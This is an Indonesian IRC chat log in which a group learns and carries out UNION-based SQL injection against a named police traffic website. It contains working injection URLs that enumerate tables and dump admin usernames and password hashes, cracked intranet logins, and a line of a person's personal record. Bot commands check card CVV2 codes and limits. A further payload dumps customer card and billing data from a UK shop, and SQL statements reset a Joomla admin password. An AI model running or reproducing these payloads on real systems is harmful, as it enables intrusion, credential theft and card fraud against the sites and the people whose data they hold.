<&home_edition2001> di versi 4 gak ada
<&home_edition2001> itu isinya kek daftar isi tabel dan colom suatu database
<&home_edition2001> xixix
<+coayaoo> klo versi 4 gimana om bius
<&home_edition2001> wew
<+[DEVIL_MAY_CRY]> ok seep
<&home_edition2001> tebek2an
<&home_edition2001> xixix
<+[DEVIL_MAY_CRY]> perintahnya cemana tu?
<&home_edition2001> <&home_edition2001> klo 4 nebak2 yang tadi gw bilang menghadapi pedagang budek dan gagu
<&home_edition2001> <&home_edition2001> cuman isa manggut2 sama geleng2
<+[DEVIL_MAY_CRY]> ya langsung inikan versi 5
<&home_edition2001> ok kita cari kolom ya
<+[DEVIL_MAY_CRY]> heheheh
<+dbzgts> lanjuttttttt
<+[DEVIL_MAY_CRY]> wew lag
<+[DEVIL_MAY_CRY]> duh lagi semangat
<@live> MILDnet Info : VHOST Need Vhost for your nick?? join #help for further detail
<+dbzgts> besok kita sumbang koneksi satelit ke bius
<+dbzgts> biar lancar tutor ke kita
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,table_name,2,3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()--
<&home_edition2001> ngerti gak
<&aanK> 5.0.24a-Debian_9-log
<&aanK> --root@localhost
<&home_edition2001> perintah2 itu
<&aanK> aku ndak ngerti bius
<&aanK> dikaw terangin dikit la
<+[DEVIL_MAY_CRY]> 3
<+[DEVIL_MAY_CRY]> --admin
<+[DEVIL_MAY_CRY]> 5
<+[DEVIL_MAY_CRY]> itu tabel admin ya?
<&home_edition2001> 3
<&home_edition2001> --admin
<&home_edition2001> 5
<&home_edition2001> wekek
<&home_edition2001> tabel admin
<&home_edition2001> weekek
<&home_edition2001> mantabb
<&home_edition2001> ada tabel admin
<&home_edition2001> mau liat tabel selanjutnya
<+[DEVIL_MAY_CRY]> seep
<&home_edition2001> pake liimit
<&aanK> INVALID QUERY !
<+[DEVIL_MAY_CRY]> gimana tu limit?
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,table_name,2,3,4,5,6,7,8,9 from information_schema.tables where table_schema=database() limit 0,0--
<+dbzgts> wekss error jadinya
<+[DEVIL_MAY_CRY]> hehehe iya error bius
<&home_edition2001> wew
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,table_name,2,3,4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1--
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,table_name,2,3,4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1--< tabel 1
* +suami`cari`slingkuhan (seller@Mild-5BC9724D.evanzo-server.de) Quit (Ping timeout)
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,table_name,2,3,4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1--< tabel 2
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,table_name,2,3,4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1-- << 2
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,table_name,2,3,4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=database()%20limit%203,1-- << 3
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,table_name,2,3,4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=database()%20limit%4,1-- << 4
<&home_edition2001> xixi
<&home_edition2001> dst
<&home_edition2001> ngerti ga
<&aanK> wew
<&home_edition2001> liat aja perubahannya
<+[DEVIL_MAY_CRY]> ngerti
<&aanK> terus cara ngambilnya cemana
<&home_edition2001> --aktifitas_pejalan
* +Portrait (Cheny@1C703F46.43068B63.8DFA7C87.IP) Quit (Ping timeout)
<&home_edition2001> ngambil apa
<+[DEVIL_MAY_CRY]> seep..
<+[DEVIL_MAY_CRY]> maksudnya ngeluarin isi tabel
<&home_edition2001> wew
<&home_edition2001> cari tabel yang bagus dolo la
<&home_edition2001> xixix
<&aanK> ohh
<+[DEVIL_MAY_CRY]> admin bagus tuh
<+[DEVIL_MAY_CRY]> kekeke
<&aanK> iku seperti barang sitaan
<&aanK> yach admin juga bisa bagus kek nya
<&aanK> cara ambil pass adminnya bius
<&home_edition2001> --barang_sitaan
<&home_edition2001> wakaka
<&home_edition2001> tabel yang aneh
<+[DEVIL_MAY_CRY]> kluarin admin aja bius
<&home_edition2001> oke kita bongkar ya
<&home_edition2001> tabel admin
<&home_edition2001> kita perkosa
<+[DEVIL_MAY_CRY]> asikk..asikk
<&home_edition2001> tabel2nya
<&aanK> wewe
<&home_edition2001> kolom2nya
<&aanK> asik asik
<+[DEVIL_MAY_CRY]> wew buka celana dolo ah
<&home_edition2001> maksudnya
<&home_edition2001> admin << target
<&home_edition2001> cara nyusuunnya sama kok
<+[DEVIL_MAY_CRY]> ok
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,column_name,2,3,4,5,6,7,8,9%20from%20information_schema.columns%20where%20table_name=admin%20limit%201,1/*
<+dbzgts> invalid query
<&home_edition2001> wekek
<&home_edition2001> berarti
<+[DEVIL_MAY_CRY]> INVALID QUERY !
<&home_edition2001> kita rubahkata admin kedalam format hexa
<&aanK> kok invalid bius
<+[DEVIL_MAY_CRY]> wew pake apa rubahnya?
<&home_edition2001> !google hex converter
<@live> http://www.easycalculation.com/hex-converter.php
<&aanK> wekekekkke
<+dbzgts> char(97)%2bchar(100)%2bchar(109)%2bchar(105)%2bchar(110)
<&aanK> mantaBB
<+[DEVIL_MAY_CRY]> Decimal to hexa or binary << yg ini bukan?
<&home_edition2001> !google sesimal to hexa
<@live> MILDnet Info : INFO MILDnet Network Staff doesnt responsible for anything you done in this networks as long as not disturb staff, networks and other user, so please behave your self :)
<&home_edition2001> !google desimal to hexa
<@live> http://bestfuture.wordpress.com/2007/11/15/ip-addressing/
<&home_edition2001> !google ascii to hexa
<@live> http://www.easycalculation.com/ascii-hex.php
<+_chilu_> !dns cal.kofu33.org
<+dbzgts> mantabbb
<+dbzgts> langsung muncul
<+[DEVIL_MAY_CRY]> 61 64 6D 69 6E
<+dbzgts> wkokokoko
<+[DEVIL_MAY_CRY]> itu bukan>
<+dbzgts> --DEFAULT_COLLATE_NAME
<+dbzgts> 5
<&home_edition2001> bukan
<&home_edition2001> 75736572
<&aanK> jd
<&home_edition2001> ini bilangan apa ya
<&home_edition2001> lupa
<&aanK> !google decimal to hexa
<@live> http://www.easycalculation.com/hexa-decimal-binary.php
* +Juninho (sexy@Mild-9CD5B60B.amplitudenet.com.br) Quit (Ping timeout)
<&home_edition2001> !google ascii converter
<@live> http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html
<+dbzgts> char(97)%2bchar(100)%2bchar(109)%2bchar(105)%2bchar(110) <-----jadi muncul --DEFAULT_COLLATE_NAME
<&home_edition2001> wew
<&home_edition2001> apa itu
<+dbzgts> asci converter
<+[DEVIL_MAY_CRY]> 97, 100, 109, 105, 110
<+[DEVIL_MAY_CRY]> 61, 64, 6D, 69, 6E
<+[DEVIL_MAY_CRY]> 01100001, 01100100, 01101101, 01101001, 01101110
<+dbzgts> nah yang atas devil
<+[DEVIL_MAY_CRY]> yg mana tuh?
<+dbzgts> yg 97 100
<&home_edition2001> wew
<&home_edition2001> buka
<&home_edition2001> bukan
<&home_edition2001> duh lupa gw
<+dbzgts> mank punya lu muncul apa bius
<&aanK> wedewww
<&home_edition2001> 75736572 << kek gini
<+dbzgts> weksss
<&home_edition2001> artinya user
<+[DEVIL_MAY_CRY]> 75, 73, 65, 72
<+dbzgts> --DEFAULT_COLLATE_NAME
<+dbzgts> 5
<+[DEVIL_MAY_CRY]> itu user
<+[DEVIL_MAY_CRY]> wakakak
<+dbzgts> aku muncul itu....apaan itu?
<+dbzgts> wakakaka
* +log (log@www.rhe.name) has left #nyubicrew (mbingungi)
<&aanK>
<+[DEVIL_MAY_CRY]> http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html << pake ini
<+[DEVIL_MAY_CRY]> liat kolom ke 2
<+dbzgts> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,column_name,2,3,4,5,6,7,8,9%20from%20information_schema.columns%20where%20table_name=char(97)%2bchar(100)%2bchar(109)%2bchar(105)%2bchar(110)%20limit%201,1/*
<+[DEVIL_MAY_CRY]> yg itu bukan bius?
<&home_edition2001> bukan
<+[DEVIL_MAY_CRY]> 3
<+[DEVIL_MAY_CRY]> --DEFAULT_COLLATE_NAME
<+[DEVIL_MAY_CRY]> 5
<&home_edition2001> bukan
<&home_edition2001> bukan
<&home_edition2001> bukan
<+[DEVIL_MAY_CRY]> xixixi salah
<+dbzgts> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,column_name,2,3,4,5,6,7,8,9%20from%20information_schema.columns%20where%20table_name=char(97)%2bchar(100)%2bchar(109)%2bchar(105)%2bchar(110)%20limit%202,1/*
<+dbzgts> jadi ada -- description
<+[DEVIL_MAY_CRY]> cemana donk pa guru
<+[DEVIL_MAY_CRY]> puyeng ne
* +coayaoo (kandas@Mild-89466F89.ipt.aol.com) Quit (Ping timeout)
<&aanK> 3
<&aanK> --DESCRIPTION
<&aanK> jgn nanya melulu
<&aanK> testtest
<&home_edition2001> wew
<&home_edition2001> sabar
<+[DEVIL_MAY_CRY]> 3
<+[DEVIL_MAY_CRY]> --DESCRIPTION
<+[DEVIL_MAY_CRY]> 5
<+[DEVIL_MAY_CRY]> xixixi
<+[DEVIL_MAY_CRY]> pak guru lagi otak atik
* +amigaox (azitromed@E51262AE.EE987600.98BFBD86.IP) Quit (Quit from MILDNet: )
<&home_edition2001> http://www.piclist.com/techref/ascii.htm
<&home_edition2001> buka
<+[DEVIL_MAY_CRY]> ok
* +ENGINEBOY (ENGINEBOY@Mild-C7DECCA9.rmts.satcom-systems.net) Quit (Ping timeout)
<@live> MILDnet Info : FORUM Visit our official FORUM at http://mildnet.net
* +TetRa (TetRa@tHe.pReSiDeNt.oF.tHe.uNiTeD.sTaTes.g0v) Quit (Ping timeout)
<+[DEVIL_MAY_CRY]> wew lama amat kebukanya
<&home_edition2001> HEX string
<+dbzgts> nah tuh
<&home_edition2001> admin=61646D696E
<&home_edition2001> xoxox
<&home_edition2001> ok
<&home_edition2001> balik ke tanktop
<+anakbugis> kekekek
<+[DEVIL_MAY_CRY]> ok
<+anakbugis> kembali ke tutunk
<+anakbugis> kekekek
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,column_name,2,3,4,5,6,7,8,9%20from%20information_schema.columns%20where%20table_name=0x61646D696E%20limit%201,1/*
<&home_edition2001> keluarkan
<&home_edition2001> --password
<&home_edition2001> wekeke
<&home_edition2001> cari lain lagi yu
<+[DEVIL_MAY_CRY]> 3
<+[DEVIL_MAY_CRY]> --password
<+[DEVIL_MAY_CRY]> 5
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,column_name,2,3,4,5,6,7,8,9%20from%20information_schema.columns%20where%20table_name=0x61646D696E%20limit%200,1/* << kolom 1
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,column_name,2,3,4,5,6,7,8,9%20from%20information_schema.columns%20where%20table_name=0x61646D696E%20limit%201,1/* < kolom 2
<+anakbugis> kekekeek
<+[DEVIL_MAY_CRY]> mantabb bius
<&home_edition2001> wekeke mudah kan
<&home_edition2001> maknyus
<&home_edition2001> xixi
<+[DEVIL_MAY_CRY]> 3
<+[DEVIL_MAY_CRY]> --user
<+[DEVIL_MAY_CRY]> 5
<&home_edition2001> paste tabel colom dari tabel
<&home_edition2001> paste tabel colom dari tabel
<&home_edition2001> paste tabel colom dari tabel dmin
<&home_edition2001> paste
<&home_edition2001> semuanya
<&home_edition2001> kita keluarkan
<&home_edition2001> xixix
<+anakbugis> kekekek
<+anakbugis> siaaaaaaaap
<+anakbugis> wkwkwk
<&home_edition2001> wew
<&home_edition2001> lama kali
<&home_edition2001> xixix
<&home_edition2001> masa gw juga turun tangan
<&home_edition2001> cape de
<+dbzgts> mesti bagi tugas
<+dbzgts> satu org satu
<+dbzgts> ;o
<&aanK> ZZzzzzzz
<+anakbugis> wkwkwkw
<+[DEVIL_MAY_CRY]> mesti di hex lagi ya semuanya
<&home_edition2001> xxi
<&home_edition2001> kan tadi keliatan colom2nya
<&home_edition2001> xixi
<&home_edition2001> paste la disini
<&home_edition2001> yang ada user
<&home_edition2001> password
<&home_edition2001> apa lagi
<&home_edition2001> biar bagus hasilnya
<+[DEVIL_MAY_CRY]> 3
<+[DEVIL_MAY_CRY]> --id
<+[DEVIL_MAY_CRY]> 5
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-1%20union%20select%200,1,2,concat(username,0x3a,password),4,5,6,7,8,9%20from%20user/*
<&home_edition2001> xix
<&home_edition2001> tu silakan pake
<&home_edition2001> xixi
<&home_edition2001> awawaw
<&home_edition2001> administrator:5f4dcc3b5aa765d61d8327deb882cf99
<&home_edition2001> --1
<&home_edition2001> 5
<&home_edition2001> 5f4dcc3b5aa765d61d8327deb882cf99 password
* live sets mode: -i
<&home_edition2001> loginnya di
<&home_edition2001> http://www.lantas.metro.polri.go.id/intranet
<&home_edition2001> http://www.lantas.metro.polri.go.id/intranet/ user administrator pasnya password
<&home_edition2001> xixi
<+[DEVIL_MAY_CRY]> 0x3a << variabel ini udah fix ya?
* log (log@www.rhe.name) has joined #nyubicrew
<+anakbugis> wkwkwkwkw
<@live> MILDnet Info : INFO MILDnet Network Staff doesnt responsible for anything you done in this networks as long as not disturb staff, networks and other user, so please behave your self :)
<&home_edition2001> 0x3a :
<+Estrada> Your webmin100 account has been provisioned and is ready for you to use. Thank you for your patience over the course of the account setup process.
<+Estrada> This email contains your server login information and links to useful Webmin resources.
<+Estrada> *** Your Account Information ***
<&home_edition2001> 0x3a \sama dengan :
* +nicolas (nicolas@61C41B4C.2E12D6F6.7F86A531.IP) Quit (Ping timeout)
* SancheZ (rickdes@SancheZ.RunDown.Team.RDT) has joined #nyubicrew
<+anakbugis> wkwwkkw
<+anakbugis> adminx banyak amir
<+anakbugis> wkwwkwkwk
<+[DEVIL_MAY_CRY]> 4,5,6,7,8,9 << trus nenetuin ini cuma sampe 9 cemana bius?
* Saritem is now known as saritem
<+anakbugis> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,concat(user,0x3a,password),2,3,4,5,6,7,8,9%20from%20admin%20limit%201,1/*
<+anakbugis> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,concat(user,0x3a,password),2,3,4,5,6,7,8,9%20from%20admin%20limit%200,1/*
* live sets mode: +v log
<+smart07> 2004/256 SELATAN 1 SUPRIYADI JOGLO RT 8/2 KEMBANGAN JAK-BAR 22 Laki-Laki Pelajar WNI
<+smart07> wah pelaku bius neh
<+smart07> xixixix
<+anakbugis> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,concat(user,0x3a,password),2,3,4,5,6,7,8,9%20from%20admin%20limit%204,1/*
* dimas_adon (otak.babi@Mild-EFF5383C.ipt.aol.com) has joined #nyubicrew
* live sets mode: +v SancheZ
<+anakbugis> login : polantas
<+anakbugis> pass : internet
<+anakbugis> kekekek
* ella (kandas@ella.users.mildnet.org) has joined #nyubicrew
!cvv2 4264287633287418
<+Superman> dimas_adon , <> is Visa > cvv2 : « 687 »
<+dbzgts> polisi baru belajar main internet rupanya
<+demittegal> ekeke
* +SancheZ (rickdes@SancheZ.RunDown.Team.RDT) Quit (Ping timeout)
<+[DEVIL_MAY_CRY]> wew..seeep..makasih bius atas pelajaran nya
<+[DEVIL_MAY_CRY]> mo balik dolo wes malam
* live sets mode: +v sayangmana
<+dbzgts> mantabbb bius
* kaos (kaos@kaos.users.mildnet.org) has joined #nyubicrew
!cvv2 5581080000623569
<+Superman> dimas_adon , <> is MasterCard > cvv2 : « 029 »
<+dbzgts> besok2 klo byk yg bisa jadi byk yg paste cc ke ch nah
<+dbzgts> ;o
* live sets mode: +v dimas_adon
<+anakbugis> wkwkwkwwk
* +[DEVIL_MAY_CRY] (devil@Mild-206375E4.publicvpn.net) Quit (Quit from MILDNet: )
<+anakbugis> !cclimit 4426248709839800
<+dbzgts> weww...lgsung cabut
<+Superman> [anakbugis] I found limit for your Visa (4426248709839800) : 0.243 $ (This Doesn't Mean Its Valid) >!< [[SlaveZerّ5]] for #nyubicrew
* nicolas (nicolas@787194CC.710FA170.7F86A531.IP) has joined #nyubicrew
<+dbzgts> ntar lagi on
<+dbzgts> mo keluar print dulu


http://demonpowerproducts.co.uk/customer_testimonials.php?testimonial_id=-1%20union%20select%200,1,concat(billing_name,0x3C3D3E,billing_street_address,0x3C3D3,billing_city,0x3C3D3,billing_state,0x3C3D3E,billing_postcode,0x3C3D3E,billing_country,0x3C3D3E,payment_method,0x3C3D3E,cc_owner,0x3C3D3E,cc_number,0x3C3D3E,cc_expires,0x3C3D3E,date_purchased),3,4,5,6,7%20from%20orders%20limit%204000,1000/*

UPDATE ADMIN

show tables;
show tables;select * from jos_users;
show tables;select * from jos_users;select md5('hehe');
update jos_users set password='529ca8050a00180790cf88b63468826a'where username='admin';
show tables;select * from jos_users;select md5('hehe');